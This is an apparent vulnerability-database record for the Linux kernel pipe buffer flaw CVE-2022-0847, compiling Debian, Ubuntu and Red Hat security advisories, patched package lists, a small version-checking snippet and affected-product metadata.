"date": "2022-11-23T00:00:00",
"db": "VULHUB",
"id": "VHN-429429",
"ident": null
},
{
"date": "2023-03-09T15:14:10",
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"date": "2023-01-26T15:35:03",
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"date": "2023-01-26T15:34:56",
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"date": "2023-01-26T15:34:49",
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"date": "2023-01-24T16:30:22",
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"date": "2022-12-22T02:12:53",
"db": "PACKETSTORM",
"id": "170317",
"ident": null
},
{
"date": "2023-02-17T16:07:29",
"db": "PACKETSTORM",
"id": "171043",
"ident": null
},
{
"date": "2022-12-05T15:18:44",
"db": "PACKETSTORM",
"id": "170097",
"ident": null
},
{
"date": "2022-11-23T00:15:11.007000",
"db": "NVD",
"id": "CVE-2022-40303",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-11T00:00:00",
"db": "VULHUB",
"id": "VHN-429429",
"ident": null
},
{
"date": "2025-04-29T05:15:43.693000",
"db": "NVD",
"id": "CVE-2022-40303",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2023-1174-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "171310"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "bypass",
"sources": [
{
"db": "PACKETSTORM",
"id": "170752"
}
],
"trust": 0.1
}
}
VAR-202203-0043
Vulnerability from variot - Updated: 2026-04-10 21:54
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in the copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read-only files and thereby escalate their privileges on the system. The Linux kernel has an initialization vulnerability. Information may be obtained, information may be tampered with, and a denial of service (DoS) condition may be caused.
CVE-2021-43976
Zekun Shen and Brendan Dolan-Gavitt discovered a flaw in the
mwifiex_usb_recv() function of the Marvell WiFi-Ex USB Driver.
CVE-2022-24448
Lyu Tao reported a flaw in the NFS implementation in the Linux
kernel when handling requests to open a directory on a regular file,
which could result in an information leak.
CVE-2022-25258
Szymon Heidrich reported the USB Gadget subsystem lacks certain
validation of interface OS descriptor requests, resulting in memory
corruption.
CVE-2022-25375
Szymon Heidrich reported that the RNDIS USB gadget lacks validation
of the size of the RNDIS_MSG_SET command, resulting in information
leak from kernel memory.
For the stable distribution (bullseye), these problems have been fixed in version 5.10.92-2.
For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmImAChfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0TlAw/+MoL+9zYTlpPOcWp0YMuOkEUJU3WS7udSyTSZLNZsWuQTVmPQ6ed7Fxw/ b0j6OCX9HbrIl4nJdx+7D53ujWC6hS29TLgHCb8d/TEeluXPVI2+4Nt1FcZbSXTJ 6hBNIVVIiDUV9Wco8JUVbvk+y8VCsHxqDEePpEOTZVYLyDUUdti4V7+3ZyO8XQ4/ ePeCX8QQba5FApsz4jG7CkBCxBxyley6YswPV3Zz1FF6L/hGjgluYiKFbO4mLTlX vqwv/UIAZl2rutHzzxyBE5hIlPGXfgksPI7jTmSMRkWI99cIlJWTlziecYLQUiid 2NwOyu2vrut6ZVbtmI5WbTy64Aa9EKguQLd+SbBMuK790nfTLRySaZnU52/1j1MW 1/3Nwq+pDbZ/yAAeV/TS9oKl3mG3XVOO34EGpr9A5aZzCPetyb1TQj0jR5+mjCxy RTxYZuCrisnFvVXXRZLPc1vPcZW+ULXrPQFWEEvd2WKRa6iIkDHf5ef8pHRm36mk 9Yt0x6UmmVWLRRZp7UCbD03NB5p3oJKi+i1h3d+19jQGwU2bEhfOEADCADqlZLwc /6vFZ7TrA/74LXM8MOc5+VQbxL8nGetenPSHuxNwoeXw1ry4+x9KV6YHMqeqQ/qW jFpIOfWS1HQ9vC9t46V2eE0sfrOu2Jvdm4MixwRbXhjzs/REYTY= =MIhw -----END PGP SIGNATURE----- . This update provides security fixes, bug fixes, and updates the container images. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.4.3 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/
Security updates:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account (CVE-2022-24450)
-
nanoid: Information disclosure via valueOf() function (CVE-2021-23566)
-
nodejs-shelljs: improper privilege management (CVE-2022-0144)
-
search-ui-container: follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)
-
node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
-
follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)
-
openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates (CVE-2022-0778)
-
imgcrypt: Unauthorized access to encrypted container image on a shared system due to missing check in CheckAuthorization() code path (CVE-2022-24778)
-
golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
-
opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)
Related bugs:
-
RHACM 2.4.3 image files (BZ #2057249)
-
Observability - dashboard name contains / would cause error when generating dashboard cm (BZ #2032128)
-
ACM application placement fails after renaming the application name (BZ #2033051)
-
Disable the obs metric collect should not impact the managed cluster upgrade (BZ #2039197)
-
Observability - cluster list should only contain OCP311 cluster on OCP311 dashboard (BZ #2039820)
-
The value of name label changed from clusterclaim name to cluster name (BZ #2042223)
-
VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys (BZ #2048500)
-
clusterSelector matchLabels spec are cleared when changing app name/namespace during creating an app in UI (BZ #2053211)
-
Application cluster status is not updated in UI after restoring (BZ #2053279)
-
OpenStack cluster creation is using deprecated floating IP config for 4.7+ (BZ #2056610)
-
The value of Vendor reported by cluster metrics was Other even if the vendor label in managedcluster was Openshift (BZ #2059039)
-
Subscriptions stop reconciling after channel secrets are recreated (BZ #2059954)
-
Placementrule is not reconciling on a new fresh environment (BZ #2074156)
-
The cluster claimed from clusterpool cannot be auto-imported (BZ #2074543)
-
Bugs fixed (https://bugzilla.redhat.com/):
2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion
2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic
2032128 - Observability - dashboard name contains / would cause error when generating dashboard cm
2033051 - ACM application placement fails after renaming the application name
2039197 - disable the obs metric collect should not impact the managed cluster upgrade
2039820 - Observability - cluster list should only contain OCP311 cluster on OCP311 dashboard
2042223 - the value of name label changed from clusterclaim name to cluster name
2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management
2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2048500 - VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account
2053211 - clusterSelector matchLabels spec are cleared when changing app name/namespace during creating an app in UI
2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak
2053279 - Application cluster status is not updated in UI after restoring
2056610 - OpenStack cluster creation is using deprecated floating IP config for 4.7+
2057249 - RHACM 2.4.3 images
2059039 - The value of Vendor reported by cluster metrics was Other even if the vendor label in managedcluster was Openshift
2059954 - Subscriptions stop reconciling after channel secrets are recreated
2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server
2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encrypted container image on a shared system due to missing check in CheckAuthorization() code path
2074156 - Placementrule is not reconciling on a new fresh environment
2074543 - The cluster claimed from clusterpool cannot be auto-imported
- See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security updates:
-
nanoid: Information disclosure via valueOf() function (CVE-2021-23566)
-
nodejs-shelljs: improper privilege management (CVE-2022-0144)
-
follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)
-
node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
-
follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)
Bug fix:
-
RHACM 2.3.8 images (Bugzilla #2062316)
-
Bugs fixed (https://bugzilla.redhat.com/):
2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management
2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak
2062316 - RHACM 2.3.8 images
- =========================================================================
Ubuntu Security Notice USN-5362-1
April 01, 2022
linux-intel-5.13 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
Software Description:
- linux-intel-5.13: Linux kernel for Intel IOTG
Details:
Nick Gregory discovered that the Linux kernel incorrectly handled network offload functionality. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-25636)
Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida discovered that hardware mitigations added by ARM to their processors to address Spectre-BTI were insufficient. A local attacker could potentially use this to expose sensitive information. (CVE-2022-23960)
It was discovered that the BPF verifier in the Linux kernel did not properly restrict pointer types in certain situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-23222)
Max Kellermann discovered that the Linux kernel incorrectly handled Unix pipes. A local attacker could potentially use this to modify any file that could be opened for reading. (CVE-2022-0847)
Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)
William Liu and Jamie Hill-Daniel discovered that the file system context functionality in the Linux kernel contained an integer underflow vulnerability, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2022-0185)
Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida discovered that hardware mitigations added by Intel to their processors to address Spectre-BTI were insufficient. A local attacker could potentially use this to expose sensitive information. (CVE-2022-0001)
Jann Horn discovered a race condition in the Unix domain socket implementation in the Linux kernel that could result in a read-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-4083)
It was discovered that the NFS server implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-4090)
Kirill Tkhai discovered that the XFS file system implementation in the Linux kernel did not calculate size correctly when pre-allocating space in some situations. A local attacker could use this to expose sensitive information. (CVE-2021-4155)
It was discovered that the AMD Radeon GPU driver in the Linux kernel did not properly validate writes in the debugfs file system. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-42327)
Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in the Linux kernel did not perform a GPU TLB flush in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-0330)
Samuel Page discovered that the Transparent Inter-Process Communication (TIPC) protocol implementation in the Linux kernel contained a stack-based buffer overflow. A remote attacker could use this to cause a denial of service (system crash) for systems that have a TIPC bearer configured. (CVE-2022-0435)
It was discovered that the KVM implementation for s390 systems in the Linux kernel did not properly prevent memory operations on PVM guests that were in non-protected mode. A local attacker could use this to obtain unauthorized memory write access. (CVE-2022-0516)
It was discovered that the ICMPv6 implementation in the Linux kernel did not properly deallocate memory in certain situations. A remote attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2022-0742)
It was discovered that the VMware Virtual GPU driver in the Linux kernel did not properly handle certain failure conditions, leading to a stale entry in the file descriptor table. A local attacker could use this to expose sensitive information or possibly gain administrative privileges. (CVE-2022-22942)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS:
linux-image-5.13.0-1010-intel 5.13.0-1010.10
linux-image-intel 5.13.0.1010.11
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-5362-1 CVE-2021-4083, CVE-2021-4090, CVE-2021-4155, CVE-2021-42327, CVE-2022-0001, CVE-2022-0185, CVE-2022-0330, CVE-2022-0435, CVE-2022-0492, CVE-2022-0516, CVE-2022-0742, CVE-2022-0847, CVE-2022-22942, CVE-2022-23222, CVE-2022-23960, CVE-2022-25636
Package Information: https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1010.10
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel-rt security and bug fix update
Advisory ID: RHSA-2022:0819-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:0819
Issue date: 2022-03-10
CVE Names: CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 CVE-2022-22942
=====================================================================
- Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
Red Hat Enterprise Linux for Real Time (v. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
-
kernel: improper initialization of the "flags" member of the new pipe_buffer (CVE-2022-0847)
-
kernel: Use After Free in unix_gc() which could result in a local privilege escalation (CVE-2021-0920)
-
kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout (CVE-2021-4154)
-
kernel: possible privileges escalation due to missing TLB flush (CVE-2022-0330)
-
kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS (CVE-2022-0435)
-
kernel: cgroups v1 release_agent feature may allow privilege escalation (CVE-2022-0492)
-
kernel: failing usercopy allows for use-after-free exploitation (CVE-2022-22942)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
kernel symbol '__rt_mutex_init' is exported GPL-only in kernel 4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)
-
kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree (BZ#2045589)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation
2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout
2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush
2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation
2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS
2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation
2060795 - CVE-2022-0847 kernel: improper initialization of the "flags" member of the new pipe_buffer
- Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm
x86_64:
kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
Red Hat Enterprise Linux for Real Time (v. 8):
Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm
x86_64:
kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl ISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k ord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t /AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG IODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F GbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ ypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW IOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm QfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j KIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE X1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w nEhPbkKSmMY= =CLN6 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
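The affected and fixed kernel versions recorded in this entry (introduced in 5.8, fixed in 5.15.25 on the 5.15 branch and in 5.16.11 on mainline) can be checked mechanically. A minimal sketch, assuming plain dotted x.y.z version strings; the `parse` and `affected` helper names are illustrative, not part of any advisory tooling:

```python
# Fixed versions per minor branch, taken from the version ranges in this record.
FIXED = {
    (5, 15): (5, 15, 25),
    (5, 16): (5, 16, 11),
}

def parse(version: str) -> tuple:
    """Turn a dotted kernel version like '5.15.24' into a comparable tuple."""
    return tuple(int(part) for part in version.split("."))

def affected(version: str) -> bool:
    """True if the version falls inside the affected ranges listed in this record."""
    v = parse(version)
    if v < (5, 8):             # flaw introduced in 5.8
        return False
    fix = FIXED.get(v[:2])
    if fix is not None:        # branch with a listed backported fix
        return v < fix
    return v < (5, 16, 11)     # other branches, before the mainline fix
```

Distribution kernels with backported fixes (e.g. the Debian 5.10.92-2 package above) carry suffixed version strings and need their package manager's own version comparison instead of this sketch.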
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "sma1000",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "12.4.2-02044"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.8"
},
{
"_id": null,
"model": "ovirt-engine",
"scope": "eq",
"trust": 1.0,
"vendor": "ovirt",
"version": "4.4.10.2"
},
{
"_id": null,
"model": "scalance lpe9403",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.0"
},
{
"_id": null,
"model": "enterprise linux server for power little endian update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for power little endian eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.16.11"
},
{
"_id": null,
"model": "enterprise linux server update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server for power little endian update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.1"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.15.25"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.15"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "codeready linux builder",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.16"
},
{
"_id": null,
"model": "virtualization host",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for power little endian",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.10.102"
},
{
"_id": null,
"model": "enterprise linux for power little endian eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux server update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.1"
},
{
"_id": null,
"model": "enterprise linux server for power little endian update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "sma1000",
"scope": null,
"trust": 0.8,
"vendor": "sonicwall",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux eus",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ovirt-engine",
"scope": null,
"trust": 0.8,
"vendor": "ovirt",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux for ibm z systems - extended update support",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux for ibm z systems",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "scalance lpe9403",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"credits": {
"_id": null,
"data": "Siemens reported these vulnerabilities to CISA.",
"sources": [
{
